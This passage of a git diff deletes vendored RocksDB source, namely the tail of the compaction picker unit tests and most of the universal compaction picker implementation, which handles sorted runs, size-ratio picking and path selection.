-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-
-  // Set Last level size 50000
-  // num_levels - 1 target 5000
-  // num_levels - 2 is base level with target 1000 (rounded up to
-  // max_bytes_for_level_base).
-  Add(num_levels - 1, 10U, "400", "500", 50000);
-
-  Add(0, 1U, "150", "200", 200);
-  Add(0, 2U, "150", "200", 200);
-  Add(0, 4U, "150", "200", 200);
-  Add(0, 5U, "150", "200", 200);
-  Add(0, 6U, "150", "200", 200);
-  // num_levels - 3 is over target by 100 + 1000
-  Add(num_levels - 3, 7U, "400", "500", 550);
-  Add(num_levels - 3, 8U, "600", "700", 550);
-  // num_levels - 2 is over target by 1100 + 200
-  Add(num_levels - 2, 9U, "150", "200", 5200);
-
-  UpdateVersionStorageInfo();
-
-  // Merging to the second last level: (5200 / 2100 + 1) * 1100
-  // Merging to the last level: (50000 / 6300 + 1) * 1300
-  ASSERT_EQ(2100u + 3823u + 11617u,
-            vstorage_->estimated_compaction_needed_bytes());
-}
-
-TEST_F(CompactionPickerTest, IsBottommostLevelTest) {
-  // case 1: Higher levels are empty
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  bool result =
-      Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_TRUE(result);
-
-  // case 2: Higher levels have no overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  Add(3, 7U, "k", "p");
-  Add(3, 8U, "t", "w");
-  Add(4, 9U, "a", "b");
-  Add(5, 10U, "c", "cc");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_TRUE(result);
-
-  // case 3.1: Higher levels (level 3) have overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  Add(3, 7U, "e", "g");
-  Add(3, 8U, "h", "k");
-  Add(4, 9U, "a", "b");
-  Add(5, 10U, "c", "cc");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  // case 3.2: Higher levels (level 5) have overlap
-  DeleteVersionStorage();
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  Add(3, 7U, "j", "k");
-  Add(3, 8U, "l", "m");
-  Add(4, 9U, "a", "b");
-  Add(5, 10U, "c", "cc");
-  Add(5, 11U, "h", "k");
-  Add(5, 12U, "y", "yy");
-  Add(5, 13U, "z", "zz");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  // case 3.3: Higher levels (level 5) have overlap, but it's only overlapping
-  // one key ("d")
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  Add(3, 7U, "j", "k");
-  Add(3, 8U, "l", "m");
-  Add(4, 9U, "a", "b");
-  Add(5, 10U, "c", "cc");
-  Add(5, 11U, "ccc", "d");
-  Add(5, 12U, "y", "yy");
-  Add(5, 13U, "z", "zz");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  // Level 0 files overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "s", "t");
-  Add(0, 2U, "a", "m");
-  Add(0, 3U, "b", "z");
-  Add(0, 4U, "e", "f");
-  Add(5, 10U, "y", "z");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(1, 0);
-  AddToCompactionFiles(1U);
-  AddToCompactionFiles(2U);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(4U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  // Level 0 files don't overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "s", "t");
-  Add(0, 2U, "a", "m");
-  Add(0, 3U, "b", "k");
-  Add(0, 4U, "e", "f");
-  Add(5, 10U, "y", "z");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(1, 0);
-  AddToCompactionFiles(1U);
-  AddToCompactionFiles(2U);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(4U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_TRUE(result);
-
-  // Level 1 files overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "s", "t");
-  Add(0, 2U, "a", "m");
-  Add(0, 3U, "b", "k");
-  Add(0, 4U, "e", "f");
-  Add(1, 5U, "a", "m");
-  Add(1, 6U, "n", "o");
-  Add(1, 7U, "w", "y");
-  Add(5, 10U, "y", "z");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 0);
-  AddToCompactionFiles(1U);
-  AddToCompactionFiles(2U);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(4U);
-  AddToCompactionFiles(5U);
-  AddToCompactionFiles(6U);
-  AddToCompactionFiles(7U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  DeleteVersionStorage();
-}
-
-TEST_F(CompactionPickerTest, MaxCompactionBytesHit) {
-  mutable_cf_options_.max_bytes_for_level_base = 1000000u;
-  mutable_cf_options_.max_compaction_bytes = 800000u;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // A compaction should be triggered and pick file 2 and 5.
-  // It can expand because adding file 1 and 3, the compaction size will
-  // exceed mutable_cf_options_.max_bytes_for_level_base.
-  Add(1, 1U, "100", "150", 300000U);
-  Add(1, 2U, "151", "200", 300001U, 0, 0);
-  Add(1, 3U, "201", "250", 300000U, 0, 0);
-  Add(1, 4U, "251", "300", 300000U, 0, 0);
-  Add(2, 5U, "100", "256", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(2U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(5U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, MaxCompactionBytesNotHit) {
-  mutable_cf_options_.max_bytes_for_level_base = 800000u;
-  mutable_cf_options_.max_compaction_bytes = 1000000u;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // A compaction should be triggered and pick file 2 and 5.
-  // and it expands to file 1 and 3 too.
-  Add(1, 1U, "100", "150", 300000U);
-  Add(1, 2U, "151", "200", 300001U, 0, 0);
-  Add(1, 3U, "201", "250", 300000U, 0, 0);
-  Add(1, 4U, "251", "300", 300000U, 0, 0);
-  Add(2, 5U, "000", "251", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(3U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 2)->fd.GetNumber());
-  ASSERT_EQ(5U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, IsTrivialMoveOn) {
-  mutable_cf_options_.max_bytes_for_level_base = 10000u;
-  mutable_cf_options_.max_compaction_bytes = 10001u;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // A compaction should be triggered and pick file 2
-  Add(1, 1U, "100", "150", 3000U);
-  Add(1, 2U, "151", "200", 3001U);
-  Add(1, 3U, "201", "250", 3000U);
-  Add(1, 4U, "251", "300", 3000U);
-
-  Add(3, 5U, "120", "130", 7000U);
-  Add(3, 6U, "170", "180", 7000U);
-  Add(3, 5U, "220", "230", 7000U);
-  Add(3, 5U, "270", "280", 7000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-    cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_TRUE(compaction->IsTrivialMove());
-}
-
-TEST_F(CompactionPickerTest, IsTrivialMoveOff) {
-  mutable_cf_options_.max_bytes_for_level_base = 1000000u;
-  mutable_cf_options_.max_compaction_bytes = 10000u;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // A compaction should be triggered and pick all files from level 1
-  Add(1, 1U, "100", "150", 300000U, 0, 0);
-  Add(1, 2U, "150", "200", 300000U, 0, 0);
-  Add(1, 3U, "200", "250", 300000U, 0, 0);
-  Add(1, 4U, "250", "300", 300000U, 0, 0);
-
-  Add(3, 5U, "120", "130", 6000U);
-  Add(3, 6U, "140", "150", 6000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-    cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_FALSE(compaction->IsTrivialMove());
-}
-
-TEST_F(CompactionPickerTest, CacheNextCompactionIndex) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-
-  Add(1 /* level */, 1U /* file_number */, "100" /* smallest */,
-      "149" /* largest */, 1000000000U /* file_size */);
-  file_map_[1U].first->being_compacted = true;
-  Add(1 /* level */, 2U /* file_number */, "150" /* smallest */,
-      "199" /* largest */, 900000000U /* file_size */);
-  Add(1 /* level */, 3U /* file_number */, "200" /* smallest */,
-      "249" /* largest */, 800000000U /* file_size */);
-  Add(1 /* level */, 4U /* file_number */, "250" /* smallest */,
-      "299" /* largest */, 700000000U /* file_size */);
-  Add(2 /* level */, 5U /* file_number */, "150" /* smallest */,
-      "199" /* largest */, 1U /* file_size */);
-  file_map_[5U].first->being_compacted = true;
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(0U, compaction->num_input_files(1));
-  ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2, vstorage_->NextCompactionIndex(1 /* level */));
-
-  compaction.reset(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(0U, compaction->num_input_files(1));
-  ASSERT_EQ(4U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(3, vstorage_->NextCompactionIndex(1 /* level */));
-
-  compaction.reset(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-  ASSERT_EQ(4, vstorage_->NextCompactionIndex(1 /* level */));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/compaction_picker_universal.cc b/thirdparty/rocksdb/db/compaction_picker_universal.cc
deleted file mode 100644
index 14533fb..0000000
--- a/thirdparty/rocksdb/db/compaction_picker_universal.cc
+++ /dev/null
@@ -1,748 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/compaction_picker_universal.h"
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <limits>
-#include <queue>
-#include <string>
-#include <utility>
-#include "db/column_family.h"
-#include "monitoring/statistics.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-namespace {
-// Used in universal compaction when trivial move is enabled.
-// This structure is used for the construction of min heap
-// that contains the file meta data, the level of the file
-// and the index of the file in that level
-
-struct InputFileInfo {
-  InputFileInfo() : f(nullptr) {}
-
-  FileMetaData* f;
-  size_t level;
-  size_t index;
-};
-
-// Used in universal compaction when trivial move is enabled.
-// This comparator is used for the construction of min heap
-// based on the smallest key of the file.
-struct SmallestKeyHeapComparator {
-  explicit SmallestKeyHeapComparator(const Comparator* ucmp) { ucmp_ = ucmp; }
-
-  bool operator()(InputFileInfo i1, InputFileInfo i2) const {
-    return (ucmp_->Compare(i1.f->smallest.user_key(),
-                           i2.f->smallest.user_key()) > 0);
-  }
-
- private:
-  const Comparator* ucmp_;
-};
-
-typedef std::priority_queue<InputFileInfo, std::vector<InputFileInfo>,
-                            SmallestKeyHeapComparator>
-    SmallestKeyHeap;
-
-// This function creates the heap that is used to find if the files are
-// overlapping during universal compaction when the allow_trivial_move
-// is set.
-SmallestKeyHeap create_level_heap(Compaction* c, const Comparator* ucmp) {
-  SmallestKeyHeap smallest_key_priority_q =
-      SmallestKeyHeap(SmallestKeyHeapComparator(ucmp));
-
-  InputFileInfo input_file;
-
-  for (size_t l = 0; l < c->num_input_levels(); l++) {
-    if (c->num_input_files(l) != 0) {
-      if (l == 0 && c->start_level() == 0) {
-        for (size_t i = 0; i < c->num_input_files(0); i++) {
-          input_file.f = c->input(0, i);
-          input_file.level = 0;
-          input_file.index = i;
-          smallest_key_priority_q.push(std::move(input_file));
-        }
-      } else {
-        input_file.f = c->input(l, 0);
-        input_file.level = l;
-        input_file.index = 0;
-        smallest_key_priority_q.push(std::move(input_file));
-      }
-    }
-  }
-  return smallest_key_priority_q;
-}
-
-#ifndef NDEBUG
-// smallest_seqno and largest_seqno are set iff. `files` is not empty.
-void GetSmallestLargestSeqno(const std::vector<FileMetaData*>& files,
-                             SequenceNumber* smallest_seqno,
-                             SequenceNumber* largest_seqno) {
-  bool is_first = true;
-  for (FileMetaData* f : files) {
-    assert(f->smallest_seqno <= f->largest_seqno);
-    if (is_first) {
-      is_first = false;
-      *smallest_seqno = f->smallest_seqno;
-      *largest_seqno = f->largest_seqno;
-    } else {
-      if (f->smallest_seqno < *smallest_seqno) {
-        *smallest_seqno = f->smallest_seqno;
-      }
-      if (f->largest_seqno > *largest_seqno) {
-        *largest_seqno = f->largest_seqno;
-      }
-    }
-  }
-}
-#endif
-}  // namespace
-
-// Algorithm that checks to see if there are any overlapping
-// files in the input
-bool UniversalCompactionPicker::IsInputFilesNonOverlapping(Compaction* c) {
-  auto comparator = icmp_->user_comparator();
-  int first_iter = 1;
-
-  InputFileInfo prev, curr, next;
-
-  SmallestKeyHeap smallest_key_priority_q =
-      create_level_heap(c, icmp_->user_comparator());
-
-  while (!smallest_key_priority_q.empty()) {
-    curr = smallest_key_priority_q.top();
-    smallest_key_priority_q.pop();
-
-    if (first_iter) {
-      prev = curr;
-      first_iter = 0;
-    } else {
-      if (comparator->Compare(prev.f->largest.user_key(),
-                              curr.f->smallest.user_key()) >= 0) {
-        // found overlapping files, return false
-        return false;
-      }
-      assert(comparator->Compare(curr.f->largest.user_key(),
-                                 prev.f->largest.user_key()) > 0);
-      prev = curr;
-    }
-
-    next.f = nullptr;
-
-    if (curr.level != 0 && curr.index < c->num_input_files(curr.level) - 1) {
-      next.f = c->input(curr.level, curr.index + 1);
-      next.level = curr.level;
-      next.index = curr.index + 1;
-    }
-
-    if (next.f) {
-      smallest_key_priority_q.push(std::move(next));
-    }
-  }
-  return true;
-}
-
-bool UniversalCompactionPicker::NeedsCompaction(
-    const VersionStorageInfo* vstorage) const {
-  const int kLevel0 = 0;
-  return vstorage->CompactionScore(kLevel0) >= 1;
-}
-
-void UniversalCompactionPicker::SortedRun::Dump(char* out_buf,
-                                                size_t out_buf_size,
-                                                bool print_path) const {
-  if (level == 0) {
-    assert(file != nullptr);
-    if (file->fd.GetPathId() == 0 || !print_path) {
-      snprintf(out_buf, out_buf_size, "file %" PRIu64, file->fd.GetNumber());
-    } else {
-      snprintf(out_buf, out_buf_size, "file %" PRIu64
-                                      "(path "
-                                      "%" PRIu32 ")",
-               file->fd.GetNumber(), file->fd.GetPathId());
-    }
-  } else {
-    snprintf(out_buf, out_buf_size, "level %d", level);
-  }
-}
-
-void UniversalCompactionPicker::SortedRun::DumpSizeInfo(
-    char* out_buf, size_t out_buf_size, size_t sorted_run_count) const {
-  if (level == 0) {
-    assert(file != nullptr);
-    snprintf(out_buf, out_buf_size,
-             "file %" PRIu64 "[%" ROCKSDB_PRIszt
-             "] "
-             "with size %" PRIu64 " (compensated size %" PRIu64 ")",
-             file->fd.GetNumber(), sorted_run_count, file->fd.GetFileSize(),
-             file->compensated_file_size);
-  } else {
-    snprintf(out_buf, out_buf_size,
-             "level %d[%" ROCKSDB_PRIszt
-             "] "
-             "with size %" PRIu64 " (compensated size %" PRIu64 ")",
-             level, sorted_run_count, size, compensated_file_size);
-  }
-}
-
-std::vector<UniversalCompactionPicker::SortedRun>
-UniversalCompactionPicker::CalculateSortedRuns(
-    const VersionStorageInfo& vstorage, const ImmutableCFOptions& ioptions) {
-  std::vector<UniversalCompactionPicker::SortedRun> ret;
-  for (FileMetaData* f : vstorage.LevelFiles(0)) {
-    ret.emplace_back(0, f, f->fd.GetFileSize(), f->compensated_file_size,
-                     f->being_compacted);
-  }
-  for (int level = 1; level < vstorage.num_levels(); level++) {
-    uint64_t total_compensated_size = 0U;
-    uint64_t total_size = 0U;
-    bool being_compacted = false;
-    bool is_first = true;
-    for (FileMetaData* f : vstorage.LevelFiles(level)) {
-      total_compensated_size += f->compensated_file_size;
-      total_size += f->fd.GetFileSize();
-      if (ioptions.compaction_options_universal.allow_trivial_move == true) {
-        if (f->being_compacted) {
-          being_compacted = f->being_compacted;
-        }
-      } else {
-        // Compaction always includes all files for a non-zero level, so for a
-        // non-zero level, all the files should share the same being_compacted
-        // value.
-        // This assumption is only valid when
-        // ioptions.compaction_options_universal.allow_trivial_move is false
-        assert(is_first || f->being_compacted == being_compacted);
-      }
-      if (is_first) {
-        being_compacted = f->being_compacted;
-        is_first = false;
-      }
-    }
-    if (total_compensated_size > 0) {
-      ret.emplace_back(level, nullptr, total_size, total_compensated_size,
-                       being_compacted);
-    }
-  }
-  return ret;
-}
-
-// Universal style of compaction. Pick files that are contiguous in
-// time-range to compact.
-//
-Compaction* UniversalCompactionPicker::PickCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  const int kLevel0 = 0;
-  double score = vstorage->CompactionScore(kLevel0);
-  std::vector<SortedRun> sorted_runs =
-      CalculateSortedRuns(*vstorage, ioptions_);
-
-  if (sorted_runs.size() == 0 ||
-      sorted_runs.size() <
-          (unsigned int)mutable_cf_options.level0_file_num_compaction_trigger) {
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: nothing to do\n",
-                     cf_name.c_str());
-    TEST_SYNC_POINT_CALLBACK("UniversalCompactionPicker::PickCompaction:Return",
-                             nullptr);
-    return nullptr;
-  }
-  VersionStorageInfo::LevelSummaryStorage tmp;
-  ROCKS_LOG_BUFFER_MAX_SZ(
-      log_buffer, 3072,
-      "[%s] Universal: sorted runs files(%" ROCKSDB_PRIszt "): %s\n",
-      cf_name.c_str(), sorted_runs.size(), vstorage->LevelSummary(&tmp));
-
-  // Check for size amplification first.
-  Compaction* c;
-  if ((c = PickCompactionToReduceSizeAmp(cf_name, mutable_cf_options, vstorage,
-                                         score, sorted_runs, log_buffer)) !=
-      nullptr) {
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: compacting for size amp\n",
-                     cf_name.c_str());
-  } else {
-    // Size amplification is within limits. Try reducing read
-    // amplification while maintaining file size ratios.
-    unsigned int ratio = ioptions_.compaction_options_universal.size_ratio;
-
-    if ((c = PickCompactionToReduceSortedRuns(
-             cf_name, mutable_cf_options, vstorage, score, ratio, UINT_MAX,
-             sorted_runs, log_buffer)) != nullptr) {
-      ROCKS_LOG_BUFFER(log_buffer,
-                       "[%s] Universal: compacting for size ratio\n",
-                       cf_name.c_str());
-    } else {
-      // Size amplification and file size ratios are within configured limits.
-      // If max read amplification is exceeding configured limits, then force
-      // compaction without looking at filesize ratios and try to reduce
-      // the number of files to fewer than level0_file_num_compaction_trigger.
-      // This is guaranteed by NeedsCompaction()
-      assert(sorted_runs.size() >=
-             static_cast<size_t>(
-                 mutable_cf_options.level0_file_num_compaction_trigger));
-      // Get the total number of sorted runs that are not being compacted
-      int num_sr_not_compacted = 0;
-      for (size_t i = 0; i < sorted_runs.size(); i++) {
-        if (sorted_runs[i].being_compacted == false) {
-          num_sr_not_compacted++;
-        }
-      }
-
-      // The number of sorted runs that are not being compacted is greater than
-      // the maximum allowed number of sorted runs
-      if (num_sr_not_compacted >
-          mutable_cf_options.level0_file_num_compaction_trigger) {
-        unsigned int num_files =
-            num_sr_not_compacted -
-            mutable_cf_options.level0_file_num_compaction_trigger + 1;
-        if ((c = PickCompactionToReduceSortedRuns(
-                 cf_name, mutable_cf_options, vstorage, score, UINT_MAX,
-                 num_files, sorted_runs, log_buffer)) != nullptr) {
-          ROCKS_LOG_BUFFER(log_buffer,
-                           "[%s] Universal: compacting for file num -- %u\n",
-                           cf_name.c_str(), num_files);
-        }
-      }
-    }
-  }
-  if (c == nullptr) {
-    TEST_SYNC_POINT_CALLBACK("UniversalCompactionPicker::PickCompaction:Return",
-                             nullptr);
-    return nullptr;
-  }
-
-  if (ioptions_.compaction_options_universal.allow_trivial_move == true) {
-    c->set_is_trivial_move(IsInputFilesNonOverlapping(c));
-  }
-
-// validate that all the chosen files of L0 are non overlapping in time
-#ifndef NDEBUG
-  SequenceNumber prev_smallest_seqno = 0U;
-  bool is_first = true;
-
-  size_t level_index = 0U;
-  if (c->start_level() == 0) {
-    for (auto f : *c->inputs(0)) {
-      assert(f->smallest_seqno <= f->largest_seqno);
-      if (is_first) {
-        is_first = false;
-      }
-      prev_smallest_seqno = f->smallest_seqno;
-    }
-    level_index = 1U;
-  }
-  for (; level_index < c->num_input_levels(); level_index++) {
-    if (c->num_input_files(level_index) != 0) {
-      SequenceNumber smallest_seqno = 0U;
-      SequenceNumber largest_seqno = 0U;
-      GetSmallestLargestSeqno(*(c->inputs(level_index)), &smallest_seqno,
-                              &largest_seqno);
-      if (is_first) {
-        is_first = false;
-      } else if (prev_smallest_seqno > 0) {
-        // A level is considered as the bottommost level if there are
-        // no files in higher levels or if files in higher levels do
-        // not overlap with the files being compacted. Sequence numbers
-        // of files in bottommost level can be set to 0 to help
-        // compression. As a result, the following assert may not hold
-        // if the prev_smallest_seqno is 0.
-        assert(prev_smallest_seqno > largest_seqno);
-      }
-      prev_smallest_seqno = smallest_seqno;
-    }
-  }
-#endif
-  // update statistics
-  MeasureTime(ioptions_.statistics, NUM_FILES_IN_SINGLE_COMPACTION,
-              c->inputs(0)->size());
-
-  RegisterCompaction(c);
-  vstorage->ComputeCompactionScore(ioptions_, mutable_cf_options);
-
-  TEST_SYNC_POINT_CALLBACK("UniversalCompactionPicker::PickCompaction:Return",
-                           c);
-  return c;
-}
-
-uint32_t UniversalCompactionPicker::GetPathId(
-    const ImmutableCFOptions& ioptions, uint64_t file_size) {
-  // Two conditions need to be satisfied:
-  // (1) the target path needs to be able to hold the file's size
-  // (2) Total size left in this and previous paths need to be not
-  //     smaller than expected future file size before this new file is
-  //     compacted, which is estimated based on size_ratio.
-  // For example, if now we are compacting files of size (1, 1, 2, 4, 8),
-  // we will make sure the target file, probably with size of 16, will be
-  // placed in a path so that eventually when new files are generated and
-  // compacted to (1, 1, 2, 4, 8, 16), all those files can be stored in or
-  // before the path we chose.
-  //
-  // TODO(sdong): now the case of multiple column families is not
-  // considered in this algorithm. So the target size can be violated in
-  // that case. We need to improve it.
-  uint64_t accumulated_size = 0;
-  uint64_t future_size =
-      file_size * (100 - ioptions.compaction_options_universal.size_ratio) /
-      100;
-  uint32_t p = 0;
-  assert(!ioptions.db_paths.empty());
-  for (; p < ioptions.db_paths.size() - 1; p++) {
-    uint64_t target_size = ioptions.db_paths[p].target_size;
-    if (target_size > file_size &&
-        accumulated_size + (target_size - file_size) > future_size) {
-      return p;
-    }
-    accumulated_size += target_size;
-  }
-  return p;
-}
-
-//
-// Consider compaction files based on their size differences with
-// the next file in time order.
-//
-Compaction* UniversalCompactionPicker::PickCompactionToReduceSortedRuns(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, double score, unsigned int ratio,
-    unsigned int max_number_of_files_to_compact,
-    const std::vector<SortedRun>& sorted_runs, LogBuffer* log_buffer) {
-  unsigned int min_merge_width =
-      ioptions_.compaction_options_universal.min_merge_width;
-  unsigned int max_merge_width =
-      ioptions_.compaction_options_universal.max_merge_width;
-
-  const SortedRun* sr = nullptr;
-  bool done = false;
-  size_t start_index = 0;
-  unsigned int candidate_count = 0;
-
-  unsigned int max_files_to_compact =
-      std::min(max_merge_width, max_number_of_files_to_compact);
-  min_merge_width = std::max(min_merge_width, 2U);
-
-  // Caller checks the size before executing this function. This invariant is
-  // important because otherwise we may have a possible integer underflow when
-  // dealing with unsigned types.
-  assert(sorted_runs.size() > 0);
-
-  // Considers a candidate file only if it is smaller than the
-  // total size accumulated so far.
-  for (size_t loop = 0; loop < sorted_runs.size(); loop++) {
-    candidate_count = 0;
-
-    // Skip files that are already being compacted
-    for (sr = nullptr; loop < sorted_runs.size(); loop++) {
-      sr = &sorted_runs[loop];
-
-      if (!sr->being_compacted) {
-        candidate_count = 1;
-        break;
-      }
-      char file_num_buf[kFormatFileNumberBufSize];
-      sr->Dump(file_num_buf, sizeof(file_num_buf));
-      ROCKS_LOG_BUFFER(log_buffer,
-                       "[%s] Universal: %s"
-                       "[%d] being compacted, skipping",
-                       cf_name.c_str(), file_num_buf, loop);
-
-      sr = nullptr;
-    }
-
-    // This file is not being compacted. Consider it as the
-    // first candidate to be compacted.
-    uint64_t candidate_size = sr != nullptr ? sr->compensated_file_size : 0;
-    if (sr != nullptr) {
-      char file_num_buf[kFormatFileNumberBufSize];
-      sr->Dump(file_num_buf, sizeof(file_num_buf), true);
-      ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: Possible candidate %s[%d].",
-                       cf_name.c_str(), file_num_buf, loop);
-    }
-
-    // Check if the succeeding files need compaction.
-    for (size_t i = loop + 1;
-         candidate_count < max_files_to_compact && i < sorted_runs.size();
-         i++) {
-      const SortedRun* succeeding_sr = &sorted_runs[i];
-      if (succeeding_sr->being_compacted) {
-        break;
-      }
-      // Pick files if the total/last candidate file size (increased by the
-      // specified ratio) is still larger than the next candidate file.
-      // candidate_size is the total size of files picked so far with the
-      // default kCompactionStopStyleTotalSize; with
-      // kCompactionStopStyleSimilarSize, it's simply the size of the last
-      // picked file.
